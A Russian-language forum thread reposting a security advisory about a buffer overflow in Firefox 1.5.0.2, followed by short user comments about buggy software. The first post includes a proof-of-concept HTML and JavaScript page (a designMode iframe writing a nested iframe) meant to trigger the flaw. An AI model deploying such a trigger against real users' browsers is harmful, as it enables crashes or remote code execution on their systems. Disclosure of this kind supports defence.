Показано с 1 по 5 из 5.

Переполнение буфера в Mozilla Firefox

  1. #1
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Shu_b
    Регистрация
    02.11.2004
    Сообщений
    3,553
    Вес репутации
    1639

    Переполнение буфера в Mozilla Firefox

    Переполнение буфера в Mozilla Firefox

    Программа: Mozilla Firefox 1.5.0.2, возможно более ранние версии.
    Опасность: Критическая
    Наличие эксплоита: Да

    Описание:

    Уязвимость позволяет удаленному пользователю скомпрометировать уязвимую систему.

    Уязвимость существует при обработке JavaScript кода в библиотеках js320.dll и xpcom_core.dll. Удаленный пользователь может с помощью специально сформированной Web страницы вызвать переполнение буфера и выполнит произвольный код на целевой системе. Пример:
    Код:
    <textarea cols="0" rows="0" id="x_OtherInfo" name="x_OtherInfo"></textarea> 
      <script> 
           var textarea = document.getElementsByName("x_OtherInfo"); 
           textarea=textarea.item(0); 
               var htmlarea = document.createElement("div"); 
           htmlarea.className = "htmlarea";  
           textarea.parentNode.insertBefore(htmlarea, textarea); 
           var iframe = document.createElement("iframe"); 
           htmlarea.appendChild(iframe);
                var doc = iframe.contentWindow.document; 
                     doc.designMode = "on"; 
                     doc.open(); 
                     doc.write("<iframe src=''>");
              iframe.contentWindow.focus() 
      doc.close(); 
      </script>
    </textarea>
    URL производителя: mozilla.com

    Решение: Способов устранения уязвимости не существует в настоящее время.

    * Firefox Remote Code Execution and DoS 1.5.0.2

    Источник: securitylab.ru

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Junior Member Репутация Аватар для Dark_Blaze
    Регистрация
    17.05.2005
    Адрес
    Россия.
    Сообщений
    370
    Вес репутации
    48
    Чет совсем кисло товарисчи...только вышла,а тут столько дыр...
    I live to serve,and serve to live.

  4. #3
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для ALEX(XX)
    Регистрация
    31.03.2005
    Адрес
    Чернигов
    Сообщений
    10,777
    Вес репутации
    3708
    Софта без дыр не бывает принципиально. Об этом не стоит забывать. Софт пишут люди, людям свойственно ошибаться.
    Left home for a few days and look what happens...

  5. #4
    Visiting Helper Репутация Аватар для Sunix
    Регистрация
    02.02.2006
    Сообщений
    127
    Вес репутации
    44
    в чем отличие хорошего сфота от плохого? дыр бывает много или мало

  6. #5
    Full Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Minos
    Регистрация
    03.10.2004
    Адрес
    Krasnodar, 23 RUS
    Сообщений
    499
    Вес репутации
    59
    Цитата Сообщение от Sunix
    в чем отличие хорошего сфота от плохого? дыр бывает много или мало
    Еще хороший софт быстро обновляется, засекаем...

Похожие темы

  1. Ответов: 1
    Последнее сообщение: 22.08.2008, 23:51
  2. Ответов: 1
    Последнее сообщение: 03.06.2006, 19:58
  3. Ответов: 2
    Последнее сообщение: 14.09.2005, 15:28

Свернуть/Развернуть Ваши права в разделе

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Page generated in 0.00521 seconds with 16 queries